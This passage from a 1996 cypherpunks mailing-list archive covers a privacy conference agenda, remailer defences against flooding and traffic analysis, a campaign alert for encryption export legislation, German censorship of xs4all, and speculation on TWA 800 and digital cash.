and tampering with the simple network management protocol (SNMP). You
will discover that Mae West is more than just a deceased movie star.
Datamining the Net: Cookies, Crawlers and Trackers

  o Simson Garfinkel, author, Practical Unix and Internet Security and
    PGP: Pretty Good Privacy.

A great deal of information is gathered on individuals on the Internet.
From Alta Vista to cookies to digital cash to Web Crawler, sophisticated
tools to collect, index and process this information are being
developed. Simson Garfinkel will discuss these technologies, what
information is being gathered and what is being done with it.

12:30 pm  LUNCH (provided)

1:30 pm   CONSUMERS AND SURVEILLANCE

INTELLIGENT VEHICLES AND TRACKING

Phil Agre will outline the remarkable variety of technologies of
surveillance currently being planned or implemented for road travel. The
motivations for these systems are numerous and include logistics,
traffic management, law enforcement, pollution control, and marketing.
Despite the diversity of motivations, certain unifying themes emerge.
The vast majority of the functionalities provided by these systems can
be provided anonymously.

  o Phil Agre, University of California, San Diego

GENETICS AS A SURVEILLANCE IDEOLOGY

Researches in the field of genetics are still largely dominated by the
works of molecular biologists who tend to comprehend reality through the
classical Cartesian-Newtonian paradigm which postulates that it is
possible to reduce the universe to a mechanical model in which
particular effects can be described as the direct results of specific
causes. Such an approach does not acknowledge the fact that human
physical and mental health is the result of very complex interactions.
Most illnesses and deviant behaviors are multifactorial (physical and
social environments are at least as much important as the genetic
factors) and polygenic (numerous genes could be involved). In short,
there are large probabilities that an individual carrying many
"defective" genes may never develop the corresponding illness.
Unfortunately, such fields of activities such as risk management,
insurance, law and policy-making also work mostly within the
Cartesian-Newtonian paradigm. In such a context, genetics can easily be
transformed into an ideological justification for surveillance and
social control of populations or individuals "at risk" as well as
minimizing social and environmental responsibilities.

  o Pierrot Peladeau, Progesta Inc. & editor Privacy Files

2:45 pm   BREAK

3:00 pm   SOLUTIONS: PROTECTING PRIVACY IN SURVEILLANCE SOCIETIES

A PRIVACY COMMISSIONER CASE STUDY: INTRODUCTION OF A DNA PROFILE
DATABANK TO NEW ZEALAND

Bruce Slane, Privacy Commissioner of New Zealand, will outline aspects
of a new law which came into force in New Zealand last month. The law
sanctions the establishment of a DNA profile database for police use in
criminal investigations. The law also spells out how blood samples may
be obtained from suspects for DNA analysis - voluntarily, by court
order, and ultimately by force if need be. Bruce will explain the role
of a Privacy Commissioner in scrutinising laws increasing state
surveillance using the DNA law as a case study.

  o Bruce Slane, New Zealand Privacy Commissioner

CAN PRIVACY STANDARDS ACHIEVE EFFECTIVE DATA PROTECTION?

Privacy standards are becoming an important feature of the privacy
protection landscape. The CSA Model Code for the Protection of Personal
Information is likely to be followed by other attempts to negotiate
standards in other countries and at the international level. What are
the market and regulatory incentives for the adoption of privacy
standards? Can privacy standards exist alongside data protection
legislation? What are the minimum requirements for a
registration/accreditation system for a privacy standard?
  o Colin Bennett, University of Victoria

4:30 pm   WRAPUP

----------------------------------------------------------------------------
MORE INFORMATION

More information on the conference will be available at the Privacy
International mailing list at pi-news at privacy.org (subject: subscribe)
or at the PI Home Page at http://www.privacy.org/pi/conference/ottawa/

----------------------------------------------------------------------------
REGISTRATION

Registration Fees

[] Standard - $250 CAN ($175 US)
[] Non-profit organizations/Educational - $125 CAN ($75 US)

Information

Name: ___________________________________________________________
Organization: ______________________________________________________
Address: _________________________________________________________
__________________________________________________________________
Phone/Fax: _________________________________________________________
Electronic Mail:_____________________________________________________
Credit card Number/Expiration Date: _________________________________
(Your credit card will be billed by "Diane Publishing" - Do Not Email!)
First Virtual Account (include email address)_________________________

Fax Registration form and credit card number to +1 202.547.5482

Send Check or Money Order in $US made out to Privacy International to:

Privacy International
Washington Office
666 Pennsylvania Ave, SE, Suite 301
Washington, DC 20003 USA
1-202-544-9240 (phone)
1-202-547-5482 (fax)
pi at privacy.org (email)

----------------------------------------------------------------------------
Privacy International was formed in 1990 as a watchdog on surveillance
by governments and corporations. With members in more than 40 countries,
it has created an international movement that has helped to counter
abuses of privacy by way of information technology.
Privacy International has conducted campaigns in Europe, Asia and North
America to raise awareness about the dangers of ID card systems,
military surveillance, data matching, police information systems, and
credit reporting. It is based in London, UK, and is administered by the
Electronic Privacy Information Center (EPIC) in Washington, D.C. Privacy
International publishes a quarterly newsletter (the International
Privacy Bulletin) and organizes conferences each year on privacy and
technology. More information is available at http://www.privacy.org/pi/

The Electronic Privacy Information Center is a public interest research
center in Washington, DC. It was established in 1994 to focus public
attention on emerging privacy issues relating to the National
Information Infrastructure, such as the Clipper Chip, the Digital
Telephony proposal, medical record privacy, and the sale of consumer
data. EPIC is sponsored by the Fund for Constitutional Government, a
non-profit organization established in 1974 to protect civil liberties
and constitutional rights. EPIC publishes the EPIC Alert, pursues
Freedom of Information Act litigation, and conducts policy research. For
more information, email info at epic.org, HTTP://www.epic.org or write
EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003.
+1 202 544 9240 (tel), +1 202 547 5482 (fax).

From loki at infonex.com Mon Sep 9 01:21:35 1996
From: loki at infonex.com (Lance Cottrell)
Date: Mon, 9 Sep 1996 16:21:35 +0800
Subject: strengthening remailer protocols
In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk>
Message-ID:

At 2:25 PM -0700 9/2/96, John Anonymous MacDonald wrote:
>I don't really see the use of this complicated scheme. The main
>problem seems to be that if M floods remailer R with messages to B,
>and A sends a message to C through R, then it will be clear to M that
>A's message was destined for C.
>
>Rather than divert messages, then, I propose that for each input
>message there is a 10% chance that a piece of cover traffic is
>generated. Thus, if M sends 50 messages through R and sees 6 outgoing
>messages going to remailers C, D, and D, he will now know which
>messages correspond to the message that A send through.

I quite like this load based cover traffic scheme.

Another defense against flood is to slow the rate at which the messages
leave the system. A simple modification to Mixmaster (which will be in
the next version) is to have an exponential pool. The operator sets two
parameters, a minimum pool size, and a fraction of messages to send each
time the pool is processed. 10 messages and 10% seem like good settings
to me. Given at least one cover message each time the pool is processed,
flooding is much less productive.

A side benefit of this system is a reduction in the load on the sendmail
system during a flood or spam.

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
 --Nietzsche
----------------------------------------------------------

From rp at rpini.com Mon Sep 9 01:29:55 1996
From: rp at rpini.com (Remo Pini)
Date: Mon, 9 Sep 1996 16:29:55 +0800
Subject: Photoshop, Steganograhy, and cypherpunks?
Message-ID: <9609090620.AA24328@srzts100.alcatel.ch>

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
To: cypherpunks at toad.com
Date: Mon Sep 09 08:17:48 1996

> Digital watermarking
> adds copyright information to
> a photograph that doesn't alter the photo's
> appearance.
The watermark is detectable even
> after the photo is edited or printed and rescanned.
                              ^^^^^^^^^^^^^^^^^^^^^^
go ahead, have a laugh!!!
(or show me an affordable scanner with REAL 8bit color and a calibrated
color scheme).

- ------< fate favors the prepared mind >------
Remo Pini rp at rpini.com
PGP: http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----

From loki at infonex.com Mon Sep 9 01:36:25 1996
From: loki at infonex.com (Lance Cottrell)
Date: Mon, 9 Sep 1996 16:36:25 +0800
Subject: strengthening remailer protocols
In-Reply-To:
Message-ID:

Mixmaster prevents replay, so flooding multiple copies of a single
message will not work. This is the reason Mixmaster has no reply block
feature.

I can see two ways in which replies can work safely.

One time reply blocks. Each block is used once and only once. Each
routes separately, and the creator never deploys enough to allow a good
trace (no more than 5 in existence at any one time). They would probably
need to be managed by some kind of nym-server. They have the
disadvantage of allowing denial of service by simply using up all the
available reply blocks. The blocks also point back to the sender (as all
reply blocks must). This allows an attack to rubber hose each operator
in succession at the attacker's leisure. Normal chains contain no
information about where they have been, so interception and cooperation
must happen in real time (much more difficult).

The other solution is message pools.
I think this will turn out to be the only really secure and reliable
system. Some sort of automated use of pools by remailers (so the user
need not do so directly) might be possible. I designed such a system
several months back, with little response.

At 4:50 PM -0700 9/2/96, Timothy C. May wrote:
>This type of attack is why "reply-block" schemes are fundamentally flawed.
>Any such scheme gives an attacker (a traffic analyst) a wedge with which to
>deduce mappings. It is a kind of "chosen plaintext" attack (loosely
>speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a
>name as any. One floods the reply block and simply watches where the water
>goes.
>
>(If there were more academics in the crypto community looking at digital
>mix issues, there would likely be clever names for the various attacks.)
>
>Several folks on this list, including (from memory), Scott Collins, Wei
>Dai, Hal Finney, myself, and others, have noted this weakness over the
>years.
>
>Note that merely fiddling around with probabilities of transmission, such
>as described above, will not be enough. This just adds a layer of noise,
>which will disappear under a correlation analysis.
>
>(For newcomers, there are interesting parallels between statistical
>analysis of ciphers and similar analysis of remailer networks. And lots of
>statistical tools can be used to deduce likely mappings based on
>source/sink correlations, digram analysis, etc. Making a remailer network
>robust against such analyses will take a whole more basic thinking. Merely
>increasing message volume is not enough. Nor is increasing latency enough.
>Generally speaking, of course.)
>
>Instead of reply blocks, I think use of message pools (a la BlackNet) is a
>more robust reply method, as it uses "widely-distributed messages" (a la
>Usenet newsgroups) to get around the source/sink correlation issue.
>
>--Tim May
>
>
>We got computers, we're tapping phone lines, I know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May               | Crypto Anarchy: encryption, digital money,
>tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
>Licensed Ontologist          | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
 --Nietzsche
----------------------------------------------------------

From frantz at netcom.com Mon Sep 9 02:02:44 1996
From: frantz at netcom.com (Bill Frantz)
Date: Mon, 9 Sep 1996 17:02:44 +0800
Subject: Erasing Disks, was Re: What the NSA is patenting
Message-ID: <199609090702.AAA12702@netcom6.netcom.com>

See Peter Gutmann's paper, "Secure Deletion of Data from Magnetic and
Solid-State Memory" in The Sixth USENIX Security Symposium Proceedings.
My feeling after hearing his paper was that the only thing I would trust
was thermite.

-------------------------------------------------------------------------
Bill Frantz          | "Lone Star" - My personal | Periwinkle -- Consulting
(408)356-8506        | choice for best movie of  | 16345 Englewood Ave.
frantz at netcom.com | 1996                      | Los Gatos, CA 95032, USA

From shabbir at vtw.org Mon Sep 9 02:33:46 1996
From: shabbir at vtw.org (Voters Telecommunications Watch)
Date: Mon, 9 Sep 1996 17:33:46 +0800
Subject: ALERT: Call the Commerce committee to protect your privacy!
(9/7/96)
Message-ID: <199609090211.WAA13794@panix3.panix.com>

========================================================================

      SENATE COMMERCE COMMITTEE SCHEDULED TO VOTE ON PRO-PRIVACY
      ENCRYPTION LEGISLATION (S.1726) ON THU SEPTEMBER 12, 1996

             YOUR HELP IS NEEDED TO ENSURE PASSAGE
       CALL THE COMMERCE COMMITTEE (PHONE NUMBERS BELOW)

                      September 8, 1996

   Please widely redistribute this document with this banner intact
                   until September 30, 1996

________________________________________________________________________
CONTENTS
        The Latest News
        What You Can Do Now
        Background / What To Expect This Week
        Description of S.1726, Pro-CODE Bill
        Chronology of Pro-Crypto Legislation
        For More Information / Supporting Organizations

________________________________________________________________________
THE LATEST NEWS

On Thursday September 12, the Senate Commerce Committee is set to vote
on legislation designed to enhance privacy and security on the Internet.
The bill, known as the "Promotion of Commerce Online in the Digital Era
(Pro-CODE) Act," (S. 1726) is the best hope yet for real reform of U.S.
encryption policy, and its passage by the Commerce Committee would
signify a critical step forward in the struggle for privacy and security
in the Information Age.

The bill faces significant opposition from the Clinton Administration,
who continues to cling to a cold-war era view of U.S. encryption policy.
IT IS ESSENTIAL THAT THE COMMERCE COMMITTEE HEAR FROM SUPPORTERS OF
PRIVACY AND SECURITY ON THE INTERNET.

Please take a moment to contact the committee by following the simple
instructions below.

________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and urge
them to pass S.1726 out of committee without amendments. (This is also
known as a "clean" bill.)
Any opportunity for amendments (even if they are good) opens us up to
the possibility of hostile amendments that could restrict the use of
encryption even further than today's abysmal state. It could even
prohibit the use of encryption without Clipper Chip-like key 'escrow'
technology, which includes built-in surveillance and monitoring
functionality.

1. Call/Fax the members of the Senate Commerce committee and urge them
   to pass S.1726 out of committee "cleanly". Do not use email, as it is
   not likely to be looked at in time to make a difference for the
   markup on September 12th. Use the sample communique and directory
   listing below to make it a simple TWO MINUTE task.

2. Sign the petition to support strong encryption at
   http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil
   Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
   others who have also signed.

3. Between now and Wed. September 12, it is crucial that you call all
   these members of Congress.

   P ST Name and Address            Phone           Fax
   = == ========================    ==============  ==============
   D SC Hollings, Ernest F.         1-202-224-6121  1-202-224-4293
   D MA Kerry, John F.              1-202-224-2742  1-202-224-8525
   D HI Inouye, Daniel K.           1-202-224-3934  1-202-224-6747
   D KY Ford, Wendell H.            1-202-224-4343  1-202-224-0046
   D WV Rockefeller, John D.        1-202-224-6472  na
   D LA Breaux, John B.             1-202-224-4623  na
   D NV Bryan, Richard H.           1-202-224-6244  1-202-224-1867
   D ND Dorgan, Byron L.            1-202-224-2551  1-202-224-1193
   D NE Exon, J. J.                 1-202-224-4224  1-202-224-5213
   D OR Wyden, Ron*                 1-202-224-5244  1-202-228-2717
   R SD Pressler, Larry*            1-202-224-5842  1-202-224-1259
   R MT Burns, Conrad R.(*sponsor)  1-202-224-2644  1-202-224-8594
   R AK Stevens, Ted                1-202-224-3004  1-202-224-2354
   R AZ McCain, John                1-202-224-2235  1-202-224-2862
   R WA Gorton, Slade               1-202-224-3441  1-202-224-9393
   R MS Lott, Trent*                1-202-224-6253  1-202-224-2262
   R TX Hutchison, Kay Bailey       1-202-224-5922  1-202-224-0776
   R ME Snowe, Olympia              1-202-224-5344  1-202-224-6853
   R MO Ashcroft, John*             1-202-224-6154  na
   R TN Frist, Bill                 1-202-224-3344  1-202-224-8062
   R MI Abraham, Spencer            1-202-224-4822  1-202-224-8834

   * supporter or cosponsor. The bill also enjoys broad bi-partisan
   support from members not on the committee including Senators Leahy
   (D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL

   You:
   Sen: Hello, Senator Mojo's office!

   You:
   SAY     I'm calling to urge the Senator to pass S.1726, the
   THIS->  Burns/Leahy/Pressler bill, S.1726 when the committee votes on
           it on Thursday. It's critical to the future of privacy,
           security, and electronic commerce on the internet.

   Sen: Ok, thanks!

   IF THEY SAY "The Senator has concerns about the bill", please answer,
   "Please try to work these issues out as it moves to the Senate floor,
   but passage out of committee will send an important signal to the
   Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR
   FROM YOU. Please tell us who you called, and how they sounded. We'll
   be passing this information to folks in D.C. who can help apply
   pressure where needed.

   $ Mail vtw at vtw.org
   Subject: I called so-and-so

   Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements.
   ^D

6. Forward this to your friends and colleagues in appropriate forums
   until the date of expiration at the top.
   Forward a copy of this to your Internet Service Provider as well, and
   ask them to put the following text in their message of the day
   (motd), or on their WWW page:

   ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
   The U.S. Senate will be voting on a proposal to encourage better
   security on the Internet on Thu Sep. 12th. Your help is needed to
   call Congress. See http://www.crypto.com/ for more details.
   ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

________________________________________________________________________
BACKGROUND / WHAT TO EXPECT THIS WEEK

For the past 3 years, Cyber-Rights Activists, citizens, and industry
leaders have been working hard to reform US encryption policy. Support
has been building behind several legislative proposals this year because
they send a clear signal to the Administration about the need for
security and privacy in the Information Age. The digital revolution is
currently being held hostage by the White House's Cold War restrictions
on privacy-enhancing encryption technology.

Now, with Congress less than a month away from adjournment, everyone who
supports encryption and privacy is working to see this bill leave
committee in order to send a clear message to the White House that they
are on the wrong side of the encryption issue. Although this bill may
not become law this year, its passage out of committee will be a
landmark event that will clearly tell the White House that the Congress,
the public, and the computer industry care about security and privacy,
and need strong, reliable encryption technology in order to make the
Internet a viable platform for commerce, education, and democracy.

Success for our side is not certain, and the next week is not without
risks. On September 12th, the Senate Commerce committee will hold a
"markup", where the bill is examined, voted on, and if there are enough
votes, passed out of committee.
Two things could happen:

        -the committee could pass the bill as written,
        -the committee could pass the bill with amendments.

Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments.

It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments.

________________________________________________________________________
DESCRIPTION OF S.1726, PRO-CODE BILL

Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet.

The Pro-CODE Act resolves to:

1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers.

2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength.

3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products.
________________________________________________________________________
CHRONOLOGY OF PRO-CRYPTO LEGISLATION

9/12/96 (scheduled)
        Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments.

7/25/96:
        Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/

6/26/96:
        Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/

5/2/96:
        Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

3/5/96:
        Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy).

________________________________________________________________________
FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS

There are many excellent resources online to get up to speed on crypto including the following WWW sites:

        http://www.crypto.com
        http://www.privacy.org
        http://www.eff.org
        http://www.cdt.org
        http://www.epic.org
        http://www.vtw.org

Please visit them often.
The following organizations have signed onto this alert:

        Center for Democracy and Technology
        Electronic Frontier Foundation
        Electronic Privacy Information Center
        Voters Telecommunications Watch

________________________________________________________________________
End alert
========================================================================

From weber at iez.com Mon Sep 9 03:21:47 1996
From: weber at iez.com (Rolf Weber)
Date: Mon, 9 Sep 1996 18:21:47 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To:
Message-ID: <9609090806.AA12867@spibm02>

>
> Though my German friends will perhaps feel I am picking on them, this is
> not so (this week Germany is in the hot seat, last week it was
> Singapore....).
>
...the week before it was china.

>
> * as Germany is bent on blocking sites which carry this subversive
> pamphlet, "Radikal," let us mirror it on thousands of sites around the
> world.
>
yes, please do.

>
> * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now
> attached to so many pages were to be joined by a "Star of David"? This Star
> of David symbol could mean "We support freedom to read, and our site
> contains the "Radikal" publication which Germans are forbidden to access."
>
no, please don't.
there are millions of germans besides bundesanwaltschaft.

rolf

--
-----------------------------------------
Rolf Weber              | All I ask is a chance
IEZ AG D-64625 Bensheim | to prove that money
++49-6251-1309-109      | can't make me happy.

From weber at iez.com Mon Sep 9 03:43:26 1996
From: weber at iez.com (Rolf Weber)
Date: Mon, 9 Sep 1996 18:43:26 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <199609070035.CAA06972@basement.replay.com>
Message-ID: <9609090809.AA16205@spibm02>

>
> [It just says to live radically, and to read "radikal". But
> "radikal" is a terrorist magazine after all.]
>
no, "radikal" isn't a terrorist magazine.
it's just ridiculous kiddy stuff.

rolf

--
-----------------------------------------
Rolf Weber              | All I ask is a chance
IEZ AG D-64625 Bensheim | to prove that money
++49-6251-1309-109      | can't make me happy.

From dougr at skypoint-gw.globelle.com Mon Sep 9 03:52:32 1996
From: dougr at skypoint-gw.globelle.com (Douglas B. Renner)
Date: Mon, 9 Sep 1996 18:52:32 +0800
Subject: TWA 800 - Serious thread.
In-Reply-To: <323227A1.C1B@gte.net>
Message-ID:

Okay, I'm not paranoid, but I *do* see that something's fishy.

How come the White House Chief of Staff announces just a few days after the explosion that an explosive chemical residue was found, and then -- the White House distances itself from his report?!?!

Supposedly now, we're hearing that the early tests were ruled "inconclusive". Hmmmm. I'm curious what criteria determines whether or not a test can be considered "conclusive". Might political volatility have something to do with it?

The US has our best men working on this - they are professionals. Of course if an early test came up positive, they would devote all necessary resources at the highest priority to investigate that angle completely, and immediately clear up any doubts about the validity of the test in question. For this reason, I can't swallow that "they didn't know" about the chemical residue until recently. Especially with the Chief of Staff's early remarks.

We've been told since day one that this investigation was being handled "as if it were a crime." In my mind, I've been hoping that this might shed some positive light on the contradictory signals we're being fed. Although it's pretty clear they're definitely withholding information, it just _might_ be that this is being done in a fashion intended to help with the investigation. Remember the World Trade Center investigation? They knew immediately what type of vehicle the blast was in - but they deliberately gave false information to the media.
They said they were looking into a blue station wagon or some such BS, and the culprits believed it! Federal agents staked out the rental agency where the _van_ was rented from and caught one of the buggers, who thought the investigation was way off track. Yes!!!

In other words, I'm willing to wait patiently for the truth to come out, if the professionals in charge deem it advantageous for the course of the investigation. Of course the NTSB is behaving like a puppet. I'm sure the Navy & FBI can do a much better job at the investigation than the NTSB could ever hope to do. This is as it should be.

But if we find out *AFTER* the presidential election that it was friendly fire which downed TWA 800, then... words fail me regarding such a scenario.

(FYI One witness described hearing "a sonic boom" (which is consistent with the supersonic flight of a missile.) It is significant that he described it as a sonic boom. He described first hearing it, then looking up to witness the explosion. He was interrogated at length about this detail, since as with lightning, the sound should have followed the explosion by several seconds. Unless of course, it was a true sonic boom caused by a missile on its way up to the plane. Recall the other reports of "streaks of light" leading up to and hitting the plane. Hmm!!!)

ObCrypto: Learning the truth about the government's use of the media, especially regarding when & how we are manipulated, can tell us _much_ about the relevancy of crypto in our daily lives. In particular, learning the truth is a skill we cannot allow to atrophy if this is the same political entity which seeks to implement key escrow. I say, the thread is relevant. Fortunately this forum reaches some of the most intelligent and well-informed minds on the net.

From molnard1 at nevada.edu Mon Sep 9 04:10:00 1996
From: molnard1 at nevada.edu (DAVID A MOLNAR)
Date: Mon, 9 Sep 1996 19:10:00 +0800
Subject: Conservation Laws, Money, Engines, and Ontology
In-Reply-To: <199609090401.VAA26172@dns2.noc.best.net>
Message-ID:

On Sun, 8 Sep 1996, Greg Kucharo wrote:

> Here's where reputations could come in. You couldn't open a new account
> anywhere without a good "reputation". This could aid in balancing the load
> of certain people.

Hey, if we're going to do that, why not go all the way and imagine a "virtuous society" in which e-cash is based on reputation. In order to obtain v$, one must submit to a "reputation assessment" by one of several firms, which then issue a given amount of v-cash based on their findings. An ISP simply requires an arbitrary amount of v-cash along with the usual $$ every month. At the end of the month, your friendly Moral Monitor greps thru Usenet and all the mailing lists he monitors looking for your name, then adjusts your account accordingly. Different moral codes would have different agencies. :-)

For this service, of course, you pay a modest fee. But it's a small price to pay for spiritual peace of mind.

Perhaps we'd see the rise of reputation consultants in such a system. How about people with such large "fortunes" that they create wealth simply by being associated with someone else?

Don't forget the block meetings. :->

-David Molnar

Phil Dick is dead, alas...

From schmidt at pin.de Mon Sep 9 04:16:13 1996
From: schmidt at pin.de (Stephan Schmidt)
Date: Mon, 9 Sep 1996 19:16:13 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com>
Message-ID:

September 9th,

I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.

-stephan

PS: using 3 different routes (accounts).

From molnard1 at nevada.edu Mon Sep 9 04:29:39 1996
From: molnard1 at nevada.edu (DAVID A MOLNAR)
Date: Mon, 9 Sep 1996 19:29:39 +0800
Subject: Distributed data haven monetary supply?
Message-ID:

When writing about Eternity services or other distributed data havens, one has to cover the issue of cost. After all, it takes some expenditure of resources to store data, which can translate to actual $$ (or riyals or dinar or kroner or whatever). So far that I've seen, the problem of delivering that payment has been put down to "e-cash payment" of some kind (hopefully untraceable), or creative wire transfer.

In both cases, we end up needing to implement e-cash on a wide-scale basis, or completely reforming the way banks work in most countries. After all that trouble, then, our value is still stored in terms of a real currency.

What if a node in a data haven could issue its own certificates/money for goods/services? The idea seems similar to me to the "TrustBucks" discussed recently on the list. A node's operator issues credits to others in exchange for money, favors, or space on their own machines.

However, if every node issues its own currency, but only to those it trusts, we have the same problem as w/PGP...there is no guarantee that data may flow freely from node to node, which invites weakness. It's also an open invitation to inflation, as each operator may mint many billions of $ w/o immediate consequences (perhaps combined w/spam in a misguided publicity attempt?)

Question : would it be preferable for a group of nodes to issue e-cash? I'm thinking in terms of a system where the bank's secret key is split between the participating nodes (or a certain voting subset), with a certain threshold needed to mint new currency. If there are several such constellations (and methods of exchanging currency between them), it multiplies the number of points one must subvert in order to manipulate the system.
Perhaps groupings might agree to share stored data freely between nodes in the interests of security. A user then has several different "economies" to choose from, each of which has different policies.

Once a data haven begins to derive actual _income_ or benefit from these transactions, its attitude toward economic policy may affect its ability to secure and retrieve data on command. A rich haven, for instance, may be able to afford better bandwidth between nodes, or funding for research into distributed computing. In contrast, a "poor" haven may suffer from outdated equipment, hardware failures, and possibly intermittent loss of data.

Of course, such effects will not be particularly pronounced so long as a data haven is largely a volunteer effort. If a haven were to evolve into a socially stronger entity, with clearly defined "rights" and "responsibilities" for nodes, then its policies would have greater effect. I do not see a guarantee that such a structure would be anarchic in nature, even though the technology itself is amenable.

Y'know, a group currency could prove to be a powerful tool to assert dominance/influence over a single node, much as we may speak about "dollar zones" or "yen blocs" in the real world.

Gridlock might also be a problem...what if the system is set up to demand unanimous consent, but one of the nodes just died? How does one cast out a node or add a new one without collecting the bank's key in one place? What's to stop me from adding myself as a node under 15 assumed names?

My concern is that these fears might engender the kind of 3l33t mindset sometimes seen on really lame wAR3z BBSs : a small power group, intense distrust of outsiders, almost cultish façade of devotion to said small power group, et. al. None of which is helpful.

Comments? Is it a good idea, or will it lead to ever-more confusion?

Sorry if this is a bit long, repetitive of other things previously discussed to death elsewhere, or rambling.
:-)

-David Molnar

From schmidt at pin.de Mon Sep 9 04:31:35 1996
From: schmidt at pin.de (Stephan Schmidt)
Date: Mon, 9 Sep 1996 19:31:35 +0800
Subject: [WAS xs4all.nl] Terrorists
In-Reply-To:
Message-ID:

One thought : How many of you would support terrorist
web server (say Oklahoma, TWA, Iran, Libya, RAF, IRA, ...) ?

-stephan

From gary at systemics.com Mon Sep 9 05:05:55 1996
From: gary at systemics.com (Gary Howland)
Date: Mon, 9 Sep 1996 20:05:55 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To:
Message-ID: <3233E582.FF6D5DF@systemics.com>

Enzo Michelangeli wrote:
>
> On Sat, 7 Sep 1996, Hallam-Baker wrote:
>
> > There is a massive difference between anonymous speech and anonymous
> > transactions. Anonymous speech can create problems (defamation etc.)
> > but in the main these are not problems the courts are particularly
> > good at dealing with.
>
> Perhaps, but defamation is an issue that can't be ignored either,
> especially if one tries to build systems based on reputation.

It _is_ an issue that can be ignored - if the "defamer" backs up his claims, then fine, the claims can be shown to be valid, otherwise ignore those claims. Simple.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From enzo at ima.com Mon Sep 9 05:34:17 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Mon, 9 Sep 1996 20:34:17 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <3233E582.FF6D5DF@systemics.com>
Message-ID:

On Mon, 9 Sep 1996, Gary Howland wrote:

> Enzo Michelangeli wrote:
>
> > Perhaps, but defamation is an issue that can't be ignored either,
> > especially if one tries to build systems based on reputation.
>
> It _is_ an issue that can be ignored - if the "defamer" backs up his
> claims, then fine, the claims can be shown to be valid, otherwise ignore
> those claims. Simple.

I and you may well choose to do so, but the vast majority of the human beings believe just anything that is repeated loud and long enough. Otherwise, nobody would hire PR and pay for advertisement, politicians wouldn't be fed with taxpayer's money, Bosnians would trade goods instead of gunshots, etc. I'm personally not interested in conjuring up the latest utopia for a minoritarian sect of illuminati: I need to live in the real world, and push for viable solutions that change it for better, now.

Enzo

From schmidt at pin.de Mon Sep 9 07:00:40 1996
